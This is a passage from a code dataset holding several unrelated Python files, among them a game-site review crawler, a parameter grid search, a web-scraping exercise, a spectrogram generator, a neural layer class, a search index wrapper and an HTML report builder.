log.exception(self.log_msg('Exception while add the theread posts \\\n for the url %s'%self.currenturi))\n return True\n\n @logit(log, '__setParentPage')\n def __setParentPage(self):\n \"\"\" this will set parent page info \"\"\"\n page = {}\n try:\n page['title'] = stripHtml(self.soup.find('h2','gameTitle').renderContents()) \n except:\n log.exception(self.log_msg('main page title not found %s'%self.currenturi))\n page['title'] = ''\n try:\n page['data'] = stripHtml(self.soup.find('div','description').renderContents())\n except:\n log.exception(self.log_msg('data not found %s'%self.currenturi)) \n page['data'] = '' \n \n if not page['title'] and not page['data']:\n log.info(self.log_msg(\"Data and title not found for %s,\"\\\n \" discarding this review\"%self.currenturi))\n return False \n try:\n date_str = stripHtml(self.soup.find('span', 'posted').renderContents()).\\\n split(':')[-1].strip()\n page['posted_date'] = datetime.strptime(date_str,'%b %d, %Y').strftime(\\\n \"%Y-%m-%dT%H:%M:%SZ\") #another way of python calling convention\n except:\n log.exception(self.log_msg('Posted date not found %s'%self.currenturi))\n page['posted_date'] = datetime.strftime(datetime.utcnow(), \\\n \"%Y-%m-%dT%H:%M:%SZ\")\n try:\n page['ei_data_views_count'] = int(stripHtml(self.soup.find('span', 'views').\\\n renderContents()).split(':')[-1].strip().\\\n replace(',',''))\n except:\n log.exception(self.log_msg('views count not found %s'%self.currenturi)) \n try:\n field = self.soup.find('div', 'content').findAll('strong')\n for each in field:\n tag = 'et_game_' + stripHtml(each.renderContents()).replace(':','').\\\n lower().replace(' ','_')\n if 'platforms' in tag:\n page[tag] = stripHtml(each.findParent('div').renderContents()).\\\n split(':')[-1].strip()\n elif 'release' in tag:\n tag = tag.replace('et','edate')\n date_str = stripHtml(each.next.next.__str__()).strip()\n page[tag] = datetime.strftime(datetime.strptime(date_str,'%b %d, %Y'),\\\n \"%Y-%m-%dT%H:%M:%SZ\")\n else:\n page[tag] = stripHtml(each.next.next.__str__()) \n except:\n log.exception(self.log_msg('game info not found %s'%self.currenturi))\n \n unique_key = self.currenturi\n if checkSessionInfo('review', self.session_info_out, unique_key,\\\n self.task.instance_data.get('update')):\n \n log.info(self.log_msg('Session info returns True for uri %s'\\\n %self.currenturi))\n return False\n try:\n result=updateSessionInfo('review', self.session_info_out, unique_key, \\\n get_hash( page ),'Review', self.task.instance_data.get('update'))\n if not result['updated']:\n log.exception(self.log_msg('Update session info returns False %s'%self.currenturi))\n return True\n page['parent_path'] = [] #parent path empty..recheck why not product page!!\n page['path'] = [self.task.instance_data['uri']]\n page['uri'] = self.currenturi\n page['entity'] = 'Review'\n page['uri_domain'] = urlparse.urlparse(page['uri'])[1]\n page.update(self.__task_elements_dict)\n self.pages.append(page)\n #log.info(page)\n log.info(self.log_msg('Post Added %s'%self.currenturi))\n return True \n except:\n log.exception(self.log_msg('Error while adding session info %s'%self.currenturi))\n return False \n\n @logit(log, '__iteratePosts')\n def __iteratePosts(self): \n try:\n posts = self.soup.findAll('div','comment_text_container')\n if not posts:\n log.info(self.log_msg('No posts found %s'%self.currenturi))\n return False\n log.debug(self.log_msg('Total No of Posts found is %d'%len(posts)))\n for post in posts[:]:#use some range for few data \n if not self.__addPost(post):\n return False \n return True \n except:\n log.exception(self.log_msg('can not find the data %s'%self.currenturi))\n return False \n \n @logit(log, '__addPost') \n def __addPost(self, post): \n \"\"\"\n This will take the post tag , and fetch data and meta data and add it to \n self.pages\n \"\"\"\n try:\n page = self.__getData(post)\n if not page:\n return True \n unique_key = get_hash({'posted_date' : page['posted_date'], 'data': page['data']}) \n if checkSessionInfo(self.genre, self.session_info_out, unique_key,\\\n self.task.instance_data.get('update'),parent_list\\\n = [self.task.instance_data['uri']]):\n log.info(self.log_msg('Session info returns True'))\n return False\n except:\n log.exception(self.log_msg('Cannot add the post for the url %s'%\\\n self.currenturi))\n return False\n try:\n result=updateSessionInfo(self.genre, self.session_info_out, unique_key, \\\n get_hash( page ),'review', self.task.instance_data.get('update'),\\\n parent_list=[self.task.instance_data['uri']])\n if not result['updated']:\n log.exception(self.log_msg('Update session info returns False'))\n return True\n page['parent_path'] = [self.task.instance_data['uri']]\n page['path'] = [self.task.instance_data['uri'],unique_key]\n page['uri'] = self.currenturi\n page['entity'] = 'review'\n page['uri_domain'] = urlparse.urlparse(page['uri'])[1]\n page.update(self.__task_elements_dict)\n self.pages.append(page)\n #log.info(page)\n log.info(self.log_msg('page added %s'%self.currenturi))\n return True\n except:\n log.exception(self.log_msg('Error while adding session info'))\n return False \n \n @logit(log, '__getData')\n def __getData(self, post):\n page = {}\n try:\n data_tag = post.find('div', 'comment_text')\n quote_tag = data_tag.find('div', 'quoted_msg')\n if quote_tag:\n quote_tag.extract()\n page['title'] = page['data'] = stripHtml(data_tag.renderContents()).\\\n replace('/>>','/>')\n except:\n log.exception(self.log_msg('Data not found for the url %s'%self.currenturi))\n page['title'] = page['data'] = '' \n \n if not page['title'] and not page['data']: \n log.info(self.log_msg(\"Data and title not found for %s,\"\\\n \" discarding this review\"%self.currenturi))\n return False \n try:\n date_str = stripHtml(post.find('div','comment_date').renderContents()).\\\n split('Posted')[-1].strip()\n page['posted_date']= datetime.strftime(datetime.strptime(date_str,'%m-%d-%Y %I:%M%p'),\\\n \"%Y-%m-%dT%H:%M:%SZ\") \n except:\n log.exception(self.log_msg('posted_date nt found %s'%self.currenturi))\n page['posted_date'] = datetime.strftime(datetime.utcnow(),\"%Y-%m-%dT%H:%M:%SZ\") \n \n # author info \n try:\n page['et_author_name'] = stripHtml(post.find('div','comment_username').\\\n renderContents())\n except:\n log.exception(self.log_msg('author_name not found %s'%self.currenturi))\n \n copycurrenturi = self.currenturi\n try:\n auth_link = post.find('div','comment_username').find('a')['href']\n self.currenturi = auth_link\n self.__setSoupForCurrentUri() \n try:\n page['et_author_level'] = stripHtml(self.soup.find('div','gamepad_leftnav_level').\\\n renderContents()).split('Level')[-1]\n except:\n log.exception(self.log_msg('author level not found %s'%self.currenturi)) \n try: \n auth_info = stripHtml(self.soup.find('div','info_box_text').\\\n renderContents()).split('\\n') \n for each in auth_info: \n if 'Join' in each:\n try:\n date_str = stripHtml(each.__str__()).\\\n split(':')[-1].strip()\n page['edate_author_join_date'] = datetime.\\\n strftime(datetime.strptime(date_str,'%b %d, %Y'),\\\n \"%Y-%m-%dT%H:%M:%SZ\") \n except:\n log.exception(self.log_msg('Join date not found %s'%self.currenturi))\n elif 'Experience' in each:\n page['ei_author_experience'] = int(stripHtml(each.__str__()).\\\n split(':')[-1].replace(',',''))\n elif 'GTP' in each:\n page['ei_author_gtp'] = int(stripHtml(each.__str__()).\\\n split(':')[-1].replace(',','')) \n elif 'Last' in each:\n date = stripHtml(each.__str__()).split(':')[-1].strip() \n date_exp = re.search(re.compile(r'([0-9]*) (hour|hours|minute|mins|minutes|day|days|month|months) ago'),date)\n if date_exp:\n if date_exp.group(2) in ['day','days']:\n page['edate_author_last_online'] = datetime.\\\n strftime(datetime.utcnow()-\\\n timedelta(days=int(date_exp.group(1))),\"%Y-%m-%dT%H:%M:%SZ\")\n elif date_exp.group(2) in ['hour','hours']:\n page['edate_author_last_online'] = datetime.\\\n strftime(datetime.utcnow()-timedelta(seconds=3600*int(date_exp.group(1))),\"%Y-%m-%dT%H:%M:%SZ\")\n elif date_exp.group(2) in '[minute,mins,minutes]':\n page['edate_author_last_online'] = datetime.\\\n strftime(datetime.utcnow()-timedelta(seconds=60*int(date_exp.group(1))),\"%Y-%m-%dT%H:%M:%SZ\")\n elif date_exp.group(2) in '[month,months]':\n page['edate_author_last_online'] = datetime.\\\n strftime(datetime.utcnow()-timedelta(days=30*int(date_exp.group(1))),\"%Y-%m-%dT%H:%M:%SZ\")\n \n except:\n log.exception(self.log_msg('auth_info not found %s'%self.currenturi))\n try:\n rating_info = stripHtml(self.soup.find('div','info_box_middle').\\\n find('div','info_box_title',text = re.compile('Thumb Ratings')).\\\n findNext('div').renderContents()).split('\\n')\n for each in rating_info:\n if 'Total' in each:\n try:\n page['ei_author_total_ratings_score'] = int(stripHtml(each.__str__()).\\\n split(':')[-1].replace(',',''))\n except:\n log.exception(self.log_msg('auth total score not found %s'%self.currenturi)) \n elif '+' in each:\n try:\n page['ei_author_total_positive_thumbs_given'] =\\\n int(stripHtml(each.__str__()).split(':')[-1].\\\n replace(',','').replace('-',''))\n except:\n log.exception(self.log_msg('positive thumbs no not found %s'%self.currenturi)) \n elif '-' in each:\n try:\n page['ei_author_total_negative_thumbs_given'] =\\\n int(stripHtml(each.__str__()).split(':')[-1].replace(',','').replace('-','')) \n except:\n log.exception(self.log_msg('negative thumbs not found %s'%self.currenturi)) \n \n except:\n log.exception(self.log_msg('rating info not found %s'%self.currenturi)) \n except:\n log.exception(self.log_msg('author link not found %s'%self.currenturi))\n self.currenturi = copycurrenturi \n return page \n \n \n @logit(log, '__setSoupForCurrentUri') \n def __setSoupForCurrentUri(self, data=None, headers={}):\n \"\"\"It will set soup object for the Current URI\n \"\"\"\n res = self._getHTML(data=data, headers=headers)\n if res:\n self.rawpage = res['result']\n else:\n log.info(self.log_msg('Page Content cannot be fetched for the url: \\\n %s'%self.currenturi))\n raise Exception('Page content not fetched for th url %s'%self.currenturi)\n self._setCurrentPage() \n \n \n \n \n \n \n ","sub_path":"crawler/connectors/gametrailersconnector.py","file_name":"gametrailersconnector.py","file_ext":"py","file_size_in_byte":17639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"307941858","text":"#!/home/asal/anaconda3/bin/python\n\n\nimport os\nimport matplotlib.pyplot as plt\n\n\nsteps_ahead = 24\neps_start = 0.001\neps_end = 1.0\neps_step = 0.001\n\n\ndef main():\n\teps = eps_start\n\tepss = []\n\tmean_rmses = []\n\tmin_mean_rmse = 1000000.0\n\tmin_eps = eps\n\twhile eps <= eps_end:\n\t\tcmd = './ASLR_icc_release.out 3 3 1 1 0 '\n\t\tcmd += str(round(eps, 2))\n\t\tcmd += ' '\n\t\tcmd += str(1)\n\t\tcmd += ' '\n\t\tcmd += str(2)\n\t\tcmd += ' '\n\t\tcmd += str('0.001')\n\t\tcmd += ' '\n\t\tcmd += str('0.001')\n\t\tcmd += ' '\n\t\tcmd += str(0)\n\t\tcmd += ' '\n\t\tcmd += str('0.001')\n\t\tcmd += ' '\n\t\tcmd += str('1000')\n\t\tcmd += ' '\n\t\tcmd += str(steps_ahead)\n\t\tcmd += ' 1'\t# number of threads\n\t\tresult = os.popen(cmd).read()\n\t\tresult = result.split(' ')\n\t\tepss.append(float(result[0]))\n\t\tmean_rmses.append(float(result[1]))\n\t\tif float(result[1]) < min_mean_rmse:\n\t\t\tmin_mean_rmse = float(result[1])\n\t\t\tmin_eps = eps\n\t\tprint(result[0], result[1])\n\t\teps += eps_step\n\tplt.plot(epss, mean_rmses)\n\tplt.show()\n\tprint(min_eps, min_mean_rmse)\n\n\nif __name__ == '__main__':\n main()","sub_path":"src/grid_search_ASLR.py","file_name":"grid_search_ASLR.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"32072662","text":"from urllib.request import urlopen\nfrom urllib.error import HTTPError,URLError\nfrom bs4 import BeautifulSoup\n\ndef getData(url, uit = '', uic = ''):\n\n\ttry:\n\t\thtml = urlopen(url)\n\texcept HTTPError as e:\n\t\tprint (\"http error\")\n\t\tprint (e)\n\t\treturn None\n\texcept URLError as e:\n\t\tprint(\"URL error\")\n\t\tprint(e)\n\t\treturn None\n\n\n\ttry:\n\t\tbsObj = BeautifulSoup(html.read(), features=\"html.parser\")\n\t\t#logic goes here\n\t\tprint (uit)\n\t\tprint (uic)\n\texcept AttributeError as e:\n\t\tprint(\"attribute error\")\n\t\tprint(e)\n\t\treturn None\n\treturn bsObj.findAll(uit, {\"class\": uic})\n\t# return bsObj.findAll(text = \"the prince\")\n\n\n\nuInpTag = input(\"please type the html tag name: \")\nuInpClass = input(\"please type the class(green/red) name: \")\n\nurl = \"http://www.pythonscraping.com/pages/warandpeace.html\"\n\ndata = getData(url, uInpTag, uInpClass)\n\nfor name in data:\n\tprint(name.getText())","sub_path":"scrapper/chapter2/advanceparse.py","file_name":"advanceparse.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"233197914","text":"\"\"\"\nMIT License\nCopyright (c) 2016 Francesco Gadaleta\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\nof the Software, and to permit persons to whom the Software is furnished to do\nso, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport matplotlib\n# Force matplotlib to not use any Xwindows backend.\nmatplotlib.use('Agg')\n\nfrom os import path, listdir, mkdir\nimport utils as ut\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Create data for ahem detector\")\n\nparser.add_argument(\"data_dir\", action=\"store\")\n\nconfig = parser.parse_args()\nprint(\"Creating samples from: {}\".format(config.data_dir))\n\nif not path.isdir(config.data_dir):\n\traise Exception(\"First Argument is not a directory\")\n\n# Load sound files\nsound_files = [path.join(config.data_dir, f)\n\t\t\t\tfor f in listdir(config.data_dir)\n\t\t\t\tif f.endswith(\"wav\")]\n\nif len(sound_files) == 0:\n\traise Exception(\"There are no wav files in path: {}\".format(config.data_dir))\n\nraw_sounds = ut.load_sound_files(sound_files)\n\nimage_path = path.join(config.data_dir, \"images\")\nif not path.isdir(image_path):\n\tmkdir(image_path)\n\nwindowsize = 6000 # size of sliding window (22050 samples == 0.5 sec)\nstep = 3000\nnumfiles = 0\n\ndimx = 6\ndimy = 5\n\nfor i in range(len(raw_sounds)):\n\t# create samples\n\tnumsamples = raw_sounds[i].shape[0]\n\tfile_path = path.basename(sound_files[i])\n\tfile_path = path.splitext(file_path)[0]\n\tfor x in range(0, numsamples - windowsize, step):\n\t\tb = x # begin\n\t\te = x + windowsize # end\n\n\t\tfmt_string = \"(%d/%d) %s [%d-%d] of %d file %d\"\n\t\tut.printStuff(fmt_string, (i, len(raw_sounds) - 1, file_path, x, e, numsamples, numfiles))\n\n\t\tfilename = path.join(image_path, \"{}_{}.png\".format(file_path, x))\n\t\tut.specgram_frombuffer(raw_sounds[i][x:e], dimx, dimy, fname=filename, dpi=180)\n\n\t\tnumfiles += 1\n\nprint('\\nbye!\\n')\n","sub_path":"make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"489142598","text":"'''\n Problem Statement : Going to Office\n Link : https://www.hackerearth.com/practice/basic-programming/operators/basics-of-operators/practice-problems/algorithm/going-to-office-e2ef3feb/description/\n score : 5\n'''\n\nD = int(input())\nO = list(map(int,input().split(\" \")))\nC = list(map(int,input().split(\" \")))\nOc = O[0]\nOf = O[1]\nOd = O[2]\nCs = C[0]\nCb = C[1]\nCm = C[2]\nCd = C[3]\n\nonline = int(Oc + (D-Of)*Od)\noffline = int(Cb + (D/Cs)*Cm + D*Cd)\n\nif online str:\n \"\"\"Removes the unit_ prefix from a unit attribute.\n\n For example, `_parse_unit_attr(\"unit_act\")` will return `\"act\"`.\n\n Args:\n attr: The attribute to parse.\n\n Returns:\n `attr`, but with the `\"unit_\"` prefix removed.\n\n Raises:\n ValueError: If `attr` cannot be parsed.\n\n \"\"\"\n parts = attr.split('_', maxsplit=1)\n valid_attr = len(parts) == 2 and parts[0] == \"unit\"\n if not valid_attr:\n raise ValueError(\"{0} is not a valid unit attribute.\".format(attr))\n return parts[1]\n\n\nclass Layer(log.ObservableMixin):\n \"\"\"A layer of units (neurons).\n\n Args:\n name: The name of the layer.\n size: The number of units in the layer.\n spec: The layer specification. If it is `None`, the default spec will\n be used.\n\n \"\"\"\n\n def __init__(self, name: str, size: int,\n spec: specs.LayerSpec = None) -> None:\n self.size = size\n\n if spec is None:\n self.spec = specs.LayerSpec()\n else:\n self.spec = spec\n\n self.units = [unit.Unit(self.spec.unit_spec) for _ in range(size)]\n\n self.fbi = 0.0\n super().__init__(name)\n\n def avg_act(self) -> float:\n \"\"\"Returns the average activation of the layer's units.\"\"\"\n return statistics.mean(unit.act for unit in self.units)\n\n def avg_net(self) -> float:\n \"\"\"Returns the average net input of the layer's units.\"\"\"\n return statistics.mean(unit.net for unit in self.units)\n\n def update_net(self) -> None:\n \"\"\"Updates the net input of the layer's units.\"\"\"\n for i in self.units:\n i.update_net()\n\n def update_inhibition(self) -> None:\n \"\"\"Updates the inhibition of the layer's units.\"\"\"\n # Compute feedforward inhibition\n ffi = self.spec.ff * max(self.avg_net() - self.spec.ff0, 0)\n # Compute feedback inhibition\n self.fbi = self.spec.fb_dt * (self.spec.fb * self.avg_act() - self.fbi)\n # Compute global inhibition\n gc_i = self.spec.gi * (ffi * self.fbi)\n\n for i in self.units:\n i.update_inhibition(gc_i)\n\n def update_membrane_potential(self) -> None:\n \"\"\"Updates the membrane potential of the layer's units.\"\"\"\n for i in self.units:\n i.update_membrane_potential()\n\n def update_activation(self) -> None:\n \"\"\"Updates the activation of the layer's units.\"\"\"\n for i in self.units:\n i.update_activation()\n\n def activation_cycle(self) -> None:\n \"\"\"Runs one complete activation cycle of the layer.\"\"\"\n self.update_net()\n self.update_inhibition()\n self.update_membrane_potential()\n self.update_activation()\n\n def observe(self, attr: str) -> log.ObjObs:\n \"\"\"Overrides `log.ObservableMixin.observe`.\"\"\"\n try:\n parsed = _parse_unit_attr(attr)\n return [(\"unit{0}_{1}\".format(i, parsed),\n unit.observe(parsed)[0][1])\n for i, unit in enumerate(self.units)]\n except ValueError:\n pass\n\n if attr == \"avg_act\":\n return [(\"avg_act\", self.avg_act())]\n elif attr == \"avg_net\":\n return [(\"avg_net\", self.avg_net())]\n else:\n raise ValueError(\n \"{0} is not a valid layer attribute.\".format(attr))\n","sub_path":"leabra7/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"497936412","text":"\"\"\"\nAccess to FlexNeuART forward index.\n\"\"\"\nfrom collections import namedtuple\n\nDocEntryParsed=namedtuple('DocEntryParsed',\n ['word_ids', # a list of unique word IDs\n 'word_qtys', # a list of the # of occurrences of unique words\n 'word_id_seq', # a sequence of word IDs as they appear in a document at index time (may be\n # missing stop words). It is None for non-positional indices\n 'doc_len', # document length in the number of words (at index time)\n ])\n\nWordEntry=namedtuple('WordEntry',\n ['word_id', # word ID\n 'word_freq' # of documents containing at least one of these words\n ])\n\nclass ForwardIndex:\n def __init__(self, resource_manager, field_name):\n \"\"\"Constructor of the forward index wrapper object.\n\n :param resource_manager: a resource manager reference.\n :param field_name: the name of the field, e.g., text\n \"\"\"\n self.field_name = field_name\n self.indx = resource_manager.getFwdIndex(field_name)\n self.is_raw = self.indx.isRaw()\n\n\n def get_doc_raw(self, doc_id):\n \"\"\"Obtain the raw-document text. Must be a raw-field.\n\n :param doc_id: a document ID (e.g., returned by a candidate provider)\n :return: document text or None if no such document exists\n \"\"\"\n self.check_raw_or_not(check_raw=True)\n\n return self.indx.getDocEntryRaw(doc_id)\n\n def get_word_entry_by_id(self, word_id):\n \"\"\"Retrieve word entry/info by word ID\n\n :param word_id: an integer word ID\n :return: an object of the type WordEntry or None\n \"\"\"\n self.check_raw_or_not(check_raw=False)\n assert type(word_id) == int, \"word_id must be integer!\"\n\n entry = self.indx.getWordEntry(word_id)\n if entry is None:\n return None\n\n return WordEntry(word_id=entry.mWordId, word_freq=entry.mWordFreq)\n\n def get_word_by_id(self, word_id):\n \"\"\"Retrieve the word string by ID.\n\n :param word_id: an integer word ID\n :return: a word or None if ID does not exist\n \"\"\"\n self.check_raw_or_not(check_raw=False)\n assert type(word_id) == int, \"word_id must be integer!\"\n\n return self.indx.getWord(word_id)\n\n def get_doc_parsed(self, doc_id):\n \"\"\"Get a parsed document entry.\n\n :param doc_id: a document ID (e.g., returned by a candidate provider)\n :return: an object of the type DocEntryParsed\n \"\"\"\n self.check_raw_or_not(check_raw=False)\n\n entry = self.indx.getDocEntryParsed(doc_id)\n if entry is None:\n return None\n\n return DocEntryParsed(word_ids=entry.mWordIds, word_qtys=entry.mQtys,\n word_id_seq=entry.mWordIdSeq, doc_len=entry.mDocLen)\n\n def check_raw_or_not(self, check_raw):\n if check_raw:\n if not self.is_raw:\n raise Exception(f'Field {self.field_name} is parsed and not raw text!')\n else:\n if self.is_raw:\n raise Exception(f'Field {self.field_name} is raw text rather than parsed documents!')\n\n\ndef get_forward_index(resource_manager, field_name):\n \"\"\"Create a wrapper for a forward index class.\n\n :param resource_manager: a resource manager reference.\n :param field_name: the name of the field, e.g., text\n\n :return: an object of the type ForwardIndex. There will be an exception if the index is not present.\n \"\"\"\n return ForwardIndex(resource_manager, field_name)\n\n","sub_path":"scripts/py_flexneuart/fwd_index.py","file_name":"fwd_index.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"151045350","text":"\"\"\"natcap.invest.reporting package.\"\"\"\n\nimport os\nimport logging\nimport codecs\nimport re\nimport copy\n\nfrom ... import invest\nfrom .. import utils\nfrom osgeo import gdal\nfrom . import table_generator\n\n\nLOGGER = logging.getLogger('natcap.invest.reporting')\nREPORTING_DATA = os.path.join(invest.local_dir(__file__), 'reporting_data/')\nJQUERY_URI = os.path.join(REPORTING_DATA, 'jquery-1.10.2.min.js')\nSORTTABLE_URI = os.path.join(REPORTING_DATA, 'sorttable.js')\nTOTALS_URI = os.path.join(REPORTING_DATA, 'total_functions.js')\n\n\ndef generate_report(args):\n \"\"\"Generate an html page from the arguments given in 'reporting_args'\n\n reporting_args[title] - a string for the title of the html page\n (required)\n\n reporting_args[sortable] - a boolean value indicating whether\n the sorttable.js library should be added for table sorting\n functionality (optional)\n\n reporting_args[totals] - a boolean value indicating whether\n the totals_function.js script should be added for table totals\n functionality (optional)\n\n reporting_args[out_uri] - a URI to the output destination for the html\n page (required)\n\n reporting_args[elements] - a list of dictionaries that represent html\n elements to be added to the html page. (required) If no elements\n are provided (list is empty) a blank html page will be generated.\n The 3 main element types are 'table', 'head', and 'text'.\n All elements share the following arguments:\n 'type' - a string that depicts the type of element being add.\n Currently 'table', 'head', and 'text' are defined\n (required)\n\n 'section' - a string that depicts whether the element belongs\n in the body or head of the html page.\n Values: 'body' | 'head' (required)\n\n Table element dictionary has at least the following additional\n arguments:\n 'attributes' - a dictionary of html table attributes. The\n attribute name is the key which gets set to the value\n of the key. (optional)\n Example: {'class': 'sorttable', 'id': 'parcel_table'}\n\n 'sortable' - a boolean value for whether the tables columns\n should be sortable (required)\n\n 'checkbox' - a boolean value for whether there should be a\n checkbox column. If True a 'selected total' row will be\n added to the bottom of the table that will show the\n total of the columns selected (optional)\n\n 'checkbox_pos' - an integer value for in which column\n position the the checkbox column should appear\n (optional)\n\n 'data_type' - one of the following string values:\n 'shapefile'|'hg csv'|'dictionary'. Depicts the type of data\n structure to build the table from (required)\n\n 'data' - either a list of dictionaries if 'data_type' is\n 'dictionary' or a URI to a CSV table or shapefile if\n 'data_type' is 'shapefile' or 'csv' (required). If a\n list of dictionaries, each dictionary should have\n keys that represent the columns, where each dictionary\n is a row (list could be empty)\n How the rows are ordered are defined by their\n index in the list. Formatted example:\n [{col_name_1: value, col_name_2: value, ...},\n {col_name_1: value, col_name_2: value, ...},\n ...]\n\n 'key' - a string that defines which column or field should be\n used as the keys for extracting data from a shapefile or\n csv table 'key_field'.\n (required for 'data_type' = 'shapefile' | 'csv')\n\n 'columns'- a list of dictionaries that defines the column\n structure for the table (required). The order of the\n columns from left to right is depicted by the index\n of the column dictionary in the list. Each dictionary\n in the list has the following keys and values:\n 'name' - a string for the column name (required)\n 'total' - a boolean for whether the column should be\n totaled (required)\n 'attr' - a dictionary that has key value pairs for\n optional tag attributes (optional). Ex:\n 'attr': {'class': 'offsets'}\n 'td_class' - a String to assign as a class name to\n the table data tags under the column. Each\n table data tag under the column will have a class\n attribute assigned to 'td_class' value (optional)\n\n 'total'- a boolean value for whether there should be a constant\n total row at the bottom of the table that sums the column\n values (optional)\n\n Head element dictionary has at least the following additional\n arguments:\n 'format' - a string representing the type of head element being\n added. Currently 'script' (javascript) and 'style' (css\n style) accepted (required)\n\n 'data_src'- a URI to the location of the external file for\n either the 'script' or the 'style' OR a String representing\n the html script or style (DO NOT include the tags)\n (required)\n\n 'input_type' - a String, 'File' or 'Text' that refers to how\n 'data_src' is being passed in (URI vs String) (required).\n\n 'attributes' - a dictionary that has key value pairs for\n optional tag attributes (optional). Ex:\n 'attributes': {'id': 'muni_data'}\n\n Text element dictionary has at least the following additional\n arguments:\n 'text'- a string to add as a paragraph element in the html page\n (required)\n\n returns - nothing\"\"\"\n\n LOGGER.info('Creating HTML Report')\n # Since the dictionary being is mutated, make a copy to mutate on\n # while keeping the integrity of the original\n reporting_args = copy.deepcopy(args)\n # Get the title for the html page and place it in a string with html\n # title tags\n html_title = '%s' % reporting_args['title']\n\n # Initiate the html dictionary which will store all the head and body\n # elements. The 'head' and 'body' keys points to a tuple of two lists. The\n # first list holds the string representations of the html elements and the\n # second list is the corresponding 'position' of those elements. This allows\n # for proper ordering later in 'write_html'.\n # Initialize head's first element to be the title where the -1 position\n # ensures it will be the first element\n html_obj = {'head':[html_title], 'body':[]}\n\n # A dictionary of 'types' that point to corresponding functions. When an\n # 'element' is passed in the 'type' will be one of the defined types below\n # and will execute a function that properly handles that element\n report = {\n 'table': build_table,\n 'text' : add_text_element,\n 'head': add_head_element\n }\n\n LOGGER.debug('Adding default JavaScript libs')\n # Add Jquery file to the elements list any time a html page is generated\n jquery_dict = {\n 'type': 'head', 'section': 'head', 'format': 'script',\n 'data_src': JQUERY_URI, 'input_type':'File'}\n reporting_args['elements'].insert(0, jquery_dict)\n\n # A list of tuples of possible default js libraries / scripts to add\n jsc_lib_list = [('totals', TOTALS_URI), ('sortable', SORTTABLE_URI)]\n # Used to have control of how the js libraries / scripts get added\n index = 1\n for lib_tup in jsc_lib_list:\n if (lib_tup[0] in reporting_args) and reporting_args[lib_tup[0]]:\n # Build up the dictionary for the script head element\n lib_dict = {\n 'type': 'head', 'section': 'head', 'format': 'script',\n 'data_src': lib_tup[1], 'input_type':'File'}\n # Add dictionary to elements list\n reporting_args['elements'].insert(index, lib_dict)\n index = index + 1\n\n # Iterate over the elements to be added to the html page\n for element in reporting_args['elements']:\n # There are 2 general purpose arguments that each element will have,\n # 'type' and 'section'. Get and remove these from the\n # elements dictionary (they should not be added weight passed to the\n # individual element functions)\n fun_type = element.pop('type')\n section = element.pop('section')\n\n # Process the element by calling it's specific function handler which\n # will return a string. Append this to html dictionary to be written\n # in write_html\n html_obj[section].append(report[fun_type](element))\n\n # Write the html page to 'out_uri'\n write_html(html_obj, reporting_args['out_uri'])\n\n\ndef write_html(html_obj, out_uri):\n \"\"\"Write an html file to 'out_uri' from html element represented as strings\n in 'html_obj'\n\n html_obj - a dictionary with two keys, 'head' and 'body', that point to\n lists. The list for each key is a list of the htmls elements as\n strings (required)\n example: {'head':['elem_1', 'elem_2',...],\n 'body':['elem_1', 'elem_2',...]}\n\n out_uri - a URI for the output html file\n\n returns - nothing\"\"\"\n\n LOGGER.debug('Writing HTML page')\n\n # Start the string that will be written as the html file\n html_str = ''\n\n for section in ['head', 'body']:\n # Ensure the browser interprets the html file as utf-8\n if section == 'head':\n html_str += ''\n\n # Write the tag for the section\n html_str += '<%s>' % section\n # Get the list of html string elements for this section\n sect_elements = html_obj[section]\n\n for element in sect_elements:\n # Add each element to the html string\n if type(element) is str:\n element = element\n html_str += element\n\n # Add the closing tag for the section\n html_str += '' % section\n\n # Finish the html tag\n html_str += ''\n\n #LOGGER.debug('HTML Complete String : %s', html_str)\n\n # If the URI for the html output file exists remove it\n if os.path.isfile(out_uri):\n os.remove(out_uri)\n\n # Open the file, write the string and close the file\n html_file = codecs.open(out_uri, 'wb', 'utf-8')\n html_file.write(html_str)\n html_file.close()\n\n\ndef build_table(param_args):\n \"\"\"Generates a string representing a table in html format.\n\n param_args - a dictionary that has the parameters for building up the\n html table. The dictionary includes the following:\n\n 'attributes' - a dictionary of html table attributes. The attribute\n name is the key which gets set to the value of the key.\n (optional)\n Example: {'class': 'sorttable', 'id': 'parcel_table'}\n\n param_args['sortable'] - a boolean value that determines whether the\n table should be sortable (required)\n\n param_args['data_type'] - a string depicting the type of input to\n build the table from. Either 'shapefile', 'csv', or 'dictionary'\n (required)\n\n param_args['data'] - a URI to a csv or shapefile OR a list of\n dictionaries. If a list of dictionaries the data should be\n represented in the following format: (required)\n [{col_name_1: value, col_name_2: value, ...},\n {col_name_1: value, col_name_2: value, ...},\n ...]\n\n param_args['key'] - a string that depicts which column (csv) or\n field (shapefile) will be the unique key to use in extracting\n the data into a dictionary. (required for 'data_type'\n 'shapefile' 